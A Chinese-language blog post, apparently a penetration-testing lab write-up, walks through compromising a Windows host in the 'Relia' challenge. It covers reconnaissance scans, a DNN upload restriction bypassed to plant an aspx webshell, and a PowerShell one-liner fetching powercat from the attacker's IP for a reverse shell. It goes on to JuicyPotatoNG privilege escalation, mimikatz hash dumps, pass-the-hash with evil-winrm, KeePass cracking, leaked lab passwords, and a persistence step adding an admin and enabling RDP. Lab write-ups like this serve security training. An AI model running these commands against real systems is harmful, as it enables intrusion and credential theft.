Challenge 2 - Relia(4)

 Challenge 2 - Relia(4)

下一台攻擊的順序選定外網的 192.168.xxx.248



Rustscan,└─$ rustscan -a 192.168.158.248 --scripts none --ulimit 5000 | tee rustscan



snmp check 沒開,└─$ sudo nmap -sU -p 161 192.168.158.248 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 80,135,139,445,5985,49664,49665,49666,49667,49669,49668,49670,47001,49965 192.168.158.248 | tee nmap

80/tcp    open  http          Microsoft IIS httpd 10.0

49965/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM


使用 .247 拿到的 mark 驗證與 zachary、administrator HASH 驗證看看 .248 結果都沒有用



enum4linux,└─$ enum4linux -a  192.168.158.248 | tee enum4linux                            



80 /


80 /robots.txt,有個 admin 的 URI



80 /admin 自動轉 Login 頁面



查了一下官網,預設的帳號密碼是 admin:dnnadmin



測試了預設的帳號密碼進不去,做了其嘗試後發現 admin:password 可以登入

且版本是 v. 09.11.00(46)



發現一個使用者帳號 emma@relia.com



要上傳 cmdasp.aspx 被拒絕,告知 *.aspx 是不允許上傳的



研究了一下 DNN,參考 : DotNetNuke (DNN) | HackTricks | HackTricks

原來可以自行修改上傳允許的副檔名,且路徑是 /Portals/0/shell.asp



依據文章指引,自行新增 aspx 到允許清單



再測試一次,可以成功上傳了



已知路徑在 /Portals/0/* ,測試看看 http://192.168.158.248/Portals/0/Templates/cmdasp.aspx

成功開啟,直接測試 whoami 也是正常執行



直接輸入 powershell.exe -ep bypass -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.153/tools/powercat.ps1'); powercat -c 192.168.45.153 -p 4444 -e powershell"

成功拿到 Reverse Shell 了




另外一種拿 Reverse Shell 的方式是直接上傳 Reverse Shell 的 aspx 檔案
直接下載 shell.aspx 改 IP & Port 即可
參考 : https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx


查不到 local.txt ,檢查使用者目錄發現沒有權限,看來不一定是沒有 local.txt

可能是沒有權限所有無法正常搜尋



開始 PE,whoami /priv 發現 SeImpersonatePrivilege Enabled



標準作業,上傳 nc64.exe、JuicyPotatoNG.exe

執行 .\JuicyPotatoNG.exe -t * -p nc64.exe -a "192.168.45.236 4445 -e c:\windows\system32\cmd.exe"


4445 進來了,whoami 確認是管理者,這一次再查找 local.txt 就有了,將 proof.txt 一併拿了



攻擊順序表更新如下



每一台打完後其實都有枚舉其他資訊看看,沒有找到有用的資訊就沒有另外再寫

最基本的一定是跑 mimikatz.exe 拿 HASH,以及跑 winPEASx64.exe

還有就是找找看有無詭異的檔案以及翻找 *.zip & *.kdbx

這一台 proof.txt 不放在 administrator 的桌面改放到 mark 的桌面感覺就是原廠要你特別關注

先拿 mimikatz HASH

administrator:56e4633688c0fdd57c610faf9d7ab8df



lsadump::sam 也拿到 mark 與 emma 的 HASH

 - mark:666949a828be051120b17ccba8aebfbe

 - emma:289953cccf62743ca4d1ed65183bd868



更新帳號密碼表



搜尋 *.kdbx 發現有 3 個檔案



使用 evil-winrm administrator 與 HASH 連線測試與下載檔案

└─$ evil-winrm -i 192.168.188.248 -u administrator -H 56e4633688c0fdd57c610faf9d7ab8df



下載回來後僅有一個是正常的,有兩個在另一個路徑的檔案是有問題的

keepass2john 產生 HASH 然後移除開頭的 Database:

可以參考 : https://your-it-note.blogspot.com/2023/09/blog-post_18.html



破解 HASH,└─$ hashcat -m 13400 ./keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 

獲得密碼是 welcome1



這時候要有一台安裝了 Keepass 軟體的 Windows 才有辦法開啟檔案

LAB2 替我們準備的 WINPREP 這時候就派上用場了

連線進去看看,└─$ xfreerdp -v:192.168.188.250 -u:offsec -p:lab -drive:dylan,/home/kali/lab2/248

預設沒有安裝 Keepass 密碼管理器



下載與安裝 Keepass 然後開啟 Database 看看



可以正常開啟,並獲得密碼如下

User Name:Password

Michael321:12345

bo:Luigi=Papal1963

emma:SomersetVinyl1!

emma(OLD):HabitsAgesEnd123

sa:SAPassword_1998

USE FOR NEW DB:welcome1



測試了 emma、sa 驗證有用



已知 emma 的密碼,但 emma 不是管理者,使用指令將 emma 加到本機管理者

net localgroup "Administrators" emma /add

然後開啟 RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

再開 Firewall,netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

RDP 進去了,└─$ xfreerdp -v:192.168.188.248 -u:emma -p:'SomersetVinyl1!' -drive:dylan,/home/kali/lab2/248



上述開啟 RDP 加入 emma 是因為個人喜歡 GUI 介面,個人枚舉喜好而以

不過沒有找到進一步有用的資訊



最後更新帳號密碼表



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)